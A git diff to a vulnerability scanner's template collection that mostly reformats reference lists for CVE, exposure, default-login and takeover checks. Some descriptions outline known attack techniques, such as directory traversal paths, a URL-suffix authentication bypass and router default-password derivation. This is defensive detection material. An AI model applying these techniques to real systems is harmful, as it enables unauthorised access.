a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 9f93b76ad6..5b47b94607 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -5,7 +5,7 @@ info: author: DhiyaneshDk severity: low description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. - reference: | + reference: - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 tags: cve,cve2021,xss,sidekiq diff --git a/cves/2021/CVE-2021-3019.yaml b/cves/2021/CVE-2021-3019.yaml index ffe945115e..67895708da 100644 --- a/cves/2021/CVE-2021-3019.yaml +++ b/cves/2021/CVE-2021-3019.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium description: ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet. - reference: | + reference: - https://github.com/ffay/lanproxy/commits/master - https://github.com/maybe-why-not/lanproxy/issues/1 tags: cve,cve2021,lanproxy,lfi diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index d504289755..75942eb988 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -5,7 +5,7 @@ info: author: z3bd,pdteam severity: critical description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. - reference: | + reference: - https://www.ambionics.io/blog/laravel-debug-rce - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129 tags: cve,cve2021,laravel,rce diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml index d1d4550b3f..18d299007e 100644 --- a/cves/2021/CVE-2021-31755.yaml +++ b/cves/2021/CVE-2021-31755.yaml @@ -5,7 +5,7 @@ info: description: Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. author: gy741 severity: critical - reference: | + reference: - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai tags: cve,cve2021,tenda,rce,oob diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml index 016743b0f8..2fa3648750 100644 --- a/cves/2021/CVE-2021-3223.yaml +++ b/cves/2021/CVE-2021-3223.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: high description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files. - reference: | + reference: - https://github.com/node-red/node-red-dashboard/issues/669 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 tags: cve,cve2020,node-red-dashboard,lfi diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml index 5dec02f97b..0d19eb6202 100644 --- a/cves/2021/CVE-2021-32820.yaml +++ b/cves/2021/CVE-2021-32820.yaml @@ -4,7 +4,7 @@ info: name: Express-handlebars Path Traversal author: dhiyaneshDk severity: medium - reference: | + reference: - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json tags: cve,cve2021,expressjs,lfi diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml index c89877d50d..9de55d3241 100644 --- a/cves/2021/CVE-2021-33544.yaml +++ b/cves/2021/CVE-2021-33544.yaml @@ -5,7 +5,7 @@ info: description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. author: gy741 severity: critical - reference: | + reference: - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ tags: cve,cve2021,geutebruck,rce,oob diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index 74213022a3..c81ada639b 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -3,7 +3,7 @@ id: CVE-2021-3377 info: name: Ansi_up XSS description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0. - reference: | + reference: - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 author: geeknik diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml index ebc06a6eff..78e663ef7f 100644 --- a/cves/2021/CVE-2021-34429.yaml +++ b/cves/2021/CVE-2021-34429.yaml @@ -6,7 +6,7 @@ info: severity: medium description: | For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5. - reference: | + reference: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm tags: cve,cve2021,jetty diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml index 5b884fab3a..3abdd62638 100644 --- a/cves/2021/CVE-2021-35464.yaml +++ b/cves/2021/CVE-2021-35464.yaml @@ -6,7 +6,7 @@ info: description: ForgeRock OpenAM unsafe Java deserialization RCE. severity: critical tags: cve,cve2021,openam,rce,java - reference: | + reference: - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 requests: diff --git a/default-logins/showdoc/showdoc-default-password.yaml b/default-logins/showdoc/showdoc-default-password.yaml index f992f0dac8..fcccdeac10 100644 --- a/default-logins/showdoc/showdoc-default-password.yaml +++ b/default-logins/showdoc/showdoc-default-password.yaml @@ -4,7 +4,7 @@ info: name: Showdoc Default Password author: pikpikcu severity: medium - reference: | + reference: - https://blog.star7th.com/2016/05/2007.html tags: showdoc,default-login diff --git a/default-logins/solarwinds/solarwinds-default-admin.yaml b/default-logins/solarwinds/solarwinds-default-admin.yaml index 64d31401a7..fe65c24091 100644 --- a/default-logins/solarwinds/solarwinds-default-admin.yaml +++ b/default-logins/solarwinds/solarwinds-default-admin.yaml @@ -5,6 +5,7 @@ info: author: dwisiswant0 severity: high tags: solarwinds,default-login + reference: https://github.com/solarwinds/OrionSDK/wiki/REST # Optional: # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml index 053e8816a9..2e3f547468 100644 --- a/dns/detect-dangling-cname.yaml +++ b/dns/detect-dangling-cname.yaml @@ -5,7 +5,7 @@ info: author: pdteam,nytr0gen severity: info tags: dns,takeover - reference: | + reference: - https://securitytrails.com/blog/subdomain-takeover-tips - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/ - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f diff --git a/exposures/apis/wadl-api.yaml b/exposures/apis/wadl-api.yaml index 6c429e30c6..97c367ccdf 100644 --- a/exposures/apis/wadl-api.yaml +++ b/exposures/apis/wadl-api.yaml @@ -5,7 +5,7 @@ info: author: 0xrudra,manuelbua severity: info tags: exposure,api - reference: | + reference: - https://github.com/dwisiswant0/wadl-dumper - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ diff --git a/exposures/configs/exposed-gitignore.yaml b/exposures/configs/exposed-gitignore.yaml index a4fa28537d..aaef2e6431 100644 --- a/exposures/configs/exposed-gitignore.yaml +++ b/exposures/configs/exposed-gitignore.yaml @@ -5,7 +5,7 @@ info: author: TheZakMan severity: info tags: config,git,exposure - reference: | + reference: - https://twitter.com/pratiky9967/status/1230001391701086208 - https://www.tenable.com/plugins/was/98595 diff --git a/exposures/configs/exposed-sharepoint-list.yaml b/exposures/configs/exposed-sharepoint-list.yaml index 66b5110ad9..c1bacf772a 100644 --- a/exposures/configs/exposed-sharepoint-list.yaml +++ b/exposures/configs/exposed-sharepoint-list.yaml @@ -4,7 +4,7 @@ info: name: Exposed sharepoint list author: ELSFA7110 severity: low - reference: | + reference: - https://hackerone.com/reports/761158 - https://hackerone.com/reports/300539 tags: config,exposure,sharepoint diff --git a/exposures/configs/git-config-nginxoffbyslash.yaml b/exposures/configs/git-config-nginxoffbyslash.yaml index a61a9e8069..3864e87340 100644 --- a/exposures/configs/git-config-nginxoffbyslash.yaml +++ b/exposures/configs/git-config-nginxoffbyslash.yaml @@ -5,7 +5,7 @@ info: severity: medium description: Nginx off-by-slash vulnerability exposes Git configuration. tags: config,exposure - reference: | + reference: - https://twitter.com/Random_Robbie/status/1262676628167110656 - https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py diff --git a/exposures/configs/kyan-network-credentials-disclosure.yaml b/exposures/configs/kyan-network-credentials-disclosure.yaml index c44c1fd9d0..07618dcff2 100644 --- a/exposures/configs/kyan-network-credentials-disclosure.yaml +++ b/exposures/configs/kyan-network-credentials-disclosure.yaml @@ -4,7 +4,7 @@ info: name: Kyan network monitoring device account and password exposure author: pikpikcu severity: medium - reference: | + reference: - https://mp.weixin.qq.com/s/6phWjDrGG0pCpGuCdLusIg tags: kyan,exposure,config diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 0392a42acc..bfb8e30862 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -6,7 +6,7 @@ info: description: If IIS use old .Net Framwork it's possible to enumeration folder with the symbol ~. tags: fuzz - reference: | + reference: - https://github.com/lijiejie/IIS_shortname_Scanner - https://www.exploit-db.com/exploits/19525 diff --git a/miscellaneous/tabnabbing-check.yaml b/miscellaneous/tabnabbing-check.yaml index 858ceb57bb..a7085d4359 100644 --- a/miscellaneous/tabnabbing-check.yaml +++ b/miscellaneous/tabnabbing-check.yaml @@ -5,7 +5,7 @@ info: author: bolli95 severity: info tags: misc - reference: | + reference: - https://owasp.org/www-community/attacks/Reverse_Tabnabbing - https://www.youtube.com/watch?v=TMKZCHYmtD4 - https://hackerone.com/reports/211065 diff --git a/miscellaneous/unpatched-coldfusion.yaml b/miscellaneous/unpatched-coldfusion.yaml index ad99a13175..0e02a7f3ae 100644 --- a/miscellaneous/unpatched-coldfusion.yaml +++ b/miscellaneous/unpatched-coldfusion.yaml @@ -4,7 +4,7 @@ info: name: Adobe ColdFusion - Improper Input Validation - Arbitrary Code Execution author: Daviey severity: info - reference: | + reference: - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html - https://twitter.com/Daviey/status/1374070630283415558 tags: rce,adobe,misc diff --git a/misconfiguration/apache-filename-brute-force.yaml b/misconfiguration/apache-filename-brute-force.yaml index 61863aac5d..8805e543d9 100644 --- a/misconfiguration/apache-filename-brute-force.yaml +++ b/misconfiguration/apache-filename-brute-force.yaml @@ -3,7 +3,7 @@ info: name: Apache Filename Brute Force author: geeknik description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. - reference: | + reference: - https://hackerone.com/reports/210238 - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ severity: low diff --git a/misconfiguration/exposed-service-now.yaml b/misconfiguration/exposed-service-now.yaml index b3ac7396fa..83fbedf084 100644 --- a/misconfiguration/exposed-service-now.yaml +++ b/misconfiguration/exposed-service-now.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info description: detectes misconfigured Service-now ITSM instances - reference: | + reference: - https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56 - https://github.com/leo-hildegarde/SnowDownKB/ tags: servicenow diff --git a/misconfiguration/gitlab/gitlab-public-repos.yaml b/misconfiguration/gitlab/gitlab-public-repos.yaml index c397d36cbe..7f0ed11c0f 100644 --- a/misconfiguration/gitlab/gitlab-public-repos.yaml +++ b/misconfiguration/gitlab/gitlab-public-repos.yaml @@ -5,7 +5,7 @@ info: author: ldionmarcil severity: info tags: gitlab - reference: | + reference: - https://twitter.com/ldionmarcil/status/1370052344562470922 - https://github.com/ldionmarcil/gitlab-unauth-parser diff --git a/misconfiguration/gitlab/gitlab-public-snippets.yaml b/misconfiguration/gitlab/gitlab-public-snippets.yaml index c34635b49c..61a24b4fd3 100644 --- a/misconfiguration/gitlab/gitlab-public-snippets.yaml +++ b/misconfiguration/gitlab/gitlab-public-snippets.yaml @@ -4,7 +4,7 @@ info: author: pdteam severity: info tags: gitlab - reference: | + reference: - https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10 - https://twitter.com/intigriti/status/1375078783338876929 diff --git a/misconfiguration/java-melody-exposed.yaml b/misconfiguration/java-melody-exposed.yaml index 0139f7ec02..96d080767f 100644 --- a/misconfiguration/java-melody-exposed.yaml +++ b/misconfiguration/java-melody-exposed.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK,thomas_from_offensity severity: medium description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a user’s session. - reference: | + reference: - https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/ - https://github.com/javamelody/javamelody/wiki/UserGuide#16-security tags: config,java,javamelody diff --git a/misconfiguration/sap/sap-netweaver-info-leak.yaml b/misconfiguration/sap/sap-netweaver-info-leak.yaml index 9f21c8232d..22bec165a9 100644 --- a/misconfiguration/sap/sap-netweaver-info-leak.yaml +++ b/misconfiguration/sap/sap-netweaver-info-leak.yaml @@ -6,7 +6,7 @@ info: description: Detection of SAP NetWeaver ABAP Webserver /public/info page severity: medium tags: sap - reference: | + reference: - https://www.acunetix.com/vulnerabilities/web/sap-icf-sap-public-info-sensitive-information-disclosure/ - https://github.com/Jean-Francois-C/SAP-Security-Audit diff --git a/network/deprecated-sshv1-detection.yaml b/network/deprecated-sshv1-detection.yaml index a3f21c8969..2b4744a079 100644 --- a/network/deprecated-sshv1-detection.yaml +++ b/network/deprecated-sshv1-detection.yaml @@ -6,7 +6,7 @@ info: severity: medium tags: network,ssh,openssh description: SSHv1 is a deprecated and have known cryptographic issues. - reference: | + reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml index 17eacedf6e..ece21f2b90 100644 --- a/network/openssh5.3-detect.yaml +++ b/network/openssh5.3-detect.yaml @@ -6,7 +6,7 @@ info: severity: low tags: network,openssh description: OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities. - reference: | + reference: - http://seclists.org/fulldisclosure/2016/Jul/51 - https://security-tracker.debian.org/tracker/CVE-2016-6210 - http://openwall.com/lists/oss-security/2016/08/01/2 diff --git a/takeovers/ceros-takeover.yaml b/takeovers/ceros-takeover.yaml index 1116a9f6f7..a3eea7ead5 100644 --- a/takeovers/ceros-takeover.yaml +++ b/takeovers/ceros-takeover.yaml @@ -5,7 +5,7 @@ info: author: abison_binoy severity: info tags: takeover - reference: | + reference: - https://twitter.com/abison_binoy/status/1412606224030339072 - https://www.ceros.com/educate/help_center/using-your-own-vanity-domain/ diff --git a/technologies/aem-detection.yaml b/technologies/aem-detection.yaml index 85399c2790..7ddd15c611 100644 --- a/technologies/aem-detection.yaml +++ b/technologies/aem-detection.yaml @@ -5,7 +5,7 @@ info: severity: info author: shifacyclewala,hackergautam tags: aem,favicon,tech - reference: | + reference: - https://twitter.com/brsn76945860/status/1171233054951501824 - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 diff --git a/technologies/detect-sentry.yaml b/technologies/detect-sentry.yaml index 8acee667d0..8a63c406fe 100644 --- a/technologies/detect-sentry.yaml +++ b/technologies/detect-sentry.yaml @@ -5,7 +5,7 @@ info: author: Sicksec severity: info tags: ssrf,sentry,tech - reference: | + reference: - https://hackerone.com/reports/374737 - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 89726898b3..7de8ff4337 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -4,7 +4,7 @@ info: name: favicon-detection severity: info author: un-fmunozs - reference: | + reference: - https://twitter.com/brsn76945860/status/1171233054951501824 - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 diff --git a/technologies/sonicwall-email-security-detect.yaml b/technologies/sonicwall-email-security-detect.yaml index 72a0f40847..37b391836e 100644 --- a/technologies/sonicwall-email-security-detect.yaml +++ b/technologies/sonicwall-email-security-detect.yaml @@ -4,7 +4,7 @@ info: name: SonicWall Email Security Detection author: gy741 severity: info - reference: | + reference: - https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html - https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/ tags: tech,panel diff --git a/technologies/telerik-dialoghandler-detect.yaml b/technologies/telerik-dialoghandler-detect.yaml index 5fd20eba4e..6812bbb416 100644 --- a/technologies/telerik-dialoghandler-detect.yaml +++ b/technologies/telerik-dialoghandler-detect.yaml @@ -4,7 +4,7 @@ info: name: Detect Telerik Web UI Dialog Handler author: organiccrap,zhenwarx severity: info - reference: | + reference: - https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html - https://github.com/bao7uo/dp_crypto tags: telerik,asp diff --git a/vulnerabilities/apache/apache-flink-unauth-rce.yaml b/vulnerabilities/apache/apache-flink-unauth-rce.yaml index c474ccc081..9d6613cfe9 100644 --- a/vulnerabilities/apache/apache-flink-unauth-rce.yaml +++ b/vulnerabilities/apache/apache-flink-unauth-rce.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical tags: apache,flink,rce - reference: | + reference: - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index eec12c37dc..9dfc748b75 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -5,7 +5,7 @@ info: author: DhiyaneshDk severity: high tags: apache,solr,lfi - reference: | + reference: - https://twitter.com/Al1ex4/status/1382981479727128580 - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - https://twitter.com/sec715/status/1373472323538362371 diff --git a/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml b/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml index ba60b17eb0..780055a6d9 100644 --- a/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml +++ b/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml @@ -5,7 +5,7 @@ info: author: TechbrunchFR severity: medium description: Vulnerable should be Confluence versions released from 2016 November and older - reference: | + reference: - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks - https://github.com/assetnote/blind-ssrf-chains#confluence tags: confluence,atlassian,ssrf,jira,oob diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml index 3b349afd09..54b77cfbe3 100644 --- a/vulnerabilities/generic/cache-poisoning.yaml +++ b/vulnerabilities/generic/cache-poisoning.yaml @@ -4,7 +4,7 @@ info: name: Cache Poisoning author: melbadry9,xelkomy severity: info - reference: | + reference: - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning - https://portswigger.net/research/practical-web-cache-poisoning tags: cache diff --git a/vulnerabilities/jenkins/jenkins-asyncpeople.yaml b/vulnerabilities/jenkins/jenkins-asyncpeople.yaml index fbf32774eb..41dc0e1204 100644 --- a/vulnerabilities/jenkins/jenkins-asyncpeople.yaml +++ b/vulnerabilities/jenkins/jenkins-asyncpeople.yaml @@ -1,22 +1,22 @@ -id: jenkins-async-people - -info: - name: Jenkins panel async-people - author: nadino - severity: info - tags: jenkins - reference: | - - https://bugs.eclipse.org/bugs/show_bug.cgi?id=564944 - - https://issues.jenkins.io/browse/JENKINS-30107 - - https://issues.jenkins.io/browse/JENKINS-18884 - - https://issues.jenkins.io/browse/JENKINS-26469 - -requests: - - method: GET - path: - - "{{BaseURL}}/asynchPeople/" - matchers: - - type: word - words: - - "People - [Jenkins]" - part: body +id: jenkins-async-people + +info: + name: Jenkins panel async-people + author: nadino + severity: info + tags: jenkins + reference: + - https://bugs.eclipse.org/bugs/show_bug.cgi?id=564944 + - https://issues.jenkins.io/browse/JENKINS-30107 + - https://issues.jenkins.io/browse/JENKINS-18884 + - https://issues.jenkins.io/browse/JENKINS-26469 + +requests: + - method: GET + path: + - "{{BaseURL}}/asynchPeople/" + matchers: + - type: word + words: + - "People - [Jenkins]" + part: body diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml index d6ec7e6252..40ac26b75f 100644 --- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml +++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml @@ -5,7 +5,7 @@ info: author: b0yd severity: info description: CVE-2010-1870 Struts based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8. - reference: | + reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt diff --git a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml index 66578482b4..0f66889dec 100644 --- a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml +++ b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml @@ -5,7 +5,7 @@ info: author: emenalf,tirtha_mandal,thomas_from_offensity severity: critical tags: oracle,lfi - reference: | + reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf diff --git a/vulnerabilities/oracle/oracle-ebs-xss.yaml b/vulnerabilities/oracle/oracle-ebs-xss.yaml index 710bdddd38..0ec5474ea2 100644 --- a/vulnerabilities/oracle/oracle-ebs-xss.yaml +++ b/vulnerabilities/oracle/oracle-ebs-xss.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk severity: medium tags: oracle,xss,ebs - reference: | + reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf diff --git a/vulnerabilities/other/concrete-xss.yaml b/vulnerabilities/other/concrete-xss.yaml index 19e7133e54..44e6d5fa62 100644 --- a/vulnerabilities/other/concrete-xss.yaml +++ b/vulnerabilities/other/concrete-xss.yaml @@ -6,7 +6,7 @@ info: name: Unauthenticated reflected XSS in preview_as_user function severity: medium tags: concrete,xss,cms - reference: | + reference: - https://hackerone.com/reports/643442 - https://github.com/concrete5/concrete5/pull/7999 - https://twitter.com/JacksonHHax/status/1389222207805661187 diff --git a/vulnerabilities/other/feifeicms-lfr.yaml b/vulnerabilities/other/feifeicms-lfr.yaml index 7f8eadc5da..783816ccf2 100644 --- a/vulnerabilities/other/feifeicms-lfr.yaml +++ b/vulnerabilities/other/feifeicms-lfr.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: high tags: feifeicms,lfi - reference: | + reference: - https://www.cnblogs.com/jinqi520/p/10202615.html - https://gitee.com/daicuo/feifeicms diff --git a/vulnerabilities/other/huawei-hg659-lfi.yaml b/vulnerabilities/other/huawei-hg659-lfi.yaml index db6b65b82f..e968e2fd34 100644 --- a/vulnerabilities/other/huawei-hg659-lfi.yaml +++ b/vulnerabilities/other/huawei-hg659-lfi.yaml @@ -4,7 +4,7 @@ info: name: HUAWEI HG659 LFI author: pikpikcu severity: high - reference: | + reference: - https://twitter.com/sec715/status/1406782172443287559 tags: lfi,huawei diff --git a/vulnerabilities/other/huawei-router-auth-bypass.yaml b/vulnerabilities/other/huawei-router-auth-bypass.yaml index 7cac228d9e..8ef99600e6 100644 --- a/vulnerabilities/other/huawei-router-auth-bypass.yaml +++ b/vulnerabilities/other/huawei-router-auth-bypass.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device. - reference: | + reference: - https://www.exploit-db.com/exploits/48310 tags: huawei,auth-bypass,router diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml index 6d35885dfc..7a15fb4b13 100644 --- a/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: high description: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. - reference: | + reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php - https://www.exploit-db.com/exploits/50146 - https://packetstormsecurity.com/files/163572/ diff --git a/vulnerabilities/other/maian-cart-preauth-rce.yaml b/vulnerabilities/other/maian-cart-preauth-rce.yaml index 813e0fdde0..03dc459bca 100644 --- a/vulnerabilities/other/maian-cart-preauth-rce.yaml +++ b/vulnerabilities/other/maian-cart-preauth-rce.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: critical description: A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8. - reference: | + reference: - https://dreyand.github.io/maian-cart-rce/ - https://github.com/DreyAnd/maian-cart-rce - https://www.maianscriptworld.co.uk/critical-updates diff --git a/vulnerabilities/other/mcafee-epo-rce.yaml b/vulnerabilities/other/mcafee-epo-rce.yaml index 07da44fc86..aefceea0d0 100644 --- a/vulnerabilities/other/mcafee-epo-rce.yaml +++ b/vulnerabilities/other/mcafee-epo-rce.yaml @@ -11,8 +11,7 @@ info: An attacker can create archives with files containing “../” in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction. - - reference: + reference: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ tags: mcafee,rce diff --git a/vulnerabilities/other/mirai-unknown-rce.yaml b/vulnerabilities/other/mirai-unknown-rce.yaml index 544345566f..49b88d2924 100644 --- a/vulnerabilities/other/mirai-unknown-rce.yaml +++ b/vulnerabilities/other/mirai-unknown-rce.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection. - reference: | + reference: - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai tags: mirai,rce,oob diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index 332c456650..e41a73883f 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: high description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”). - reference: | + reference: - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 tags: netgear,auth-bypass diff --git a/vulnerabilities/other/netgear-wnap320-rce.yaml b/vulnerabilities/other/netgear-wnap320-rce.yaml index 520ec9e858..e227e9d27f 100644 --- a/vulnerabilities/other/netgear-wnap320-rce.yaml +++ b/vulnerabilities/other/netgear-wnap320-rce.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: vulnerabilities in the web-based management interface of Netgear WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device. - reference: | + reference: - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE tags: netgear,rce,oob,router diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml index a307387379..c03bb02530 100644 --- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml +++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -4,7 +4,7 @@ info: name: Nginx Merge Slashes Path Traversal author: dhiyaneshDk severity: medium - reference: | + reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json - 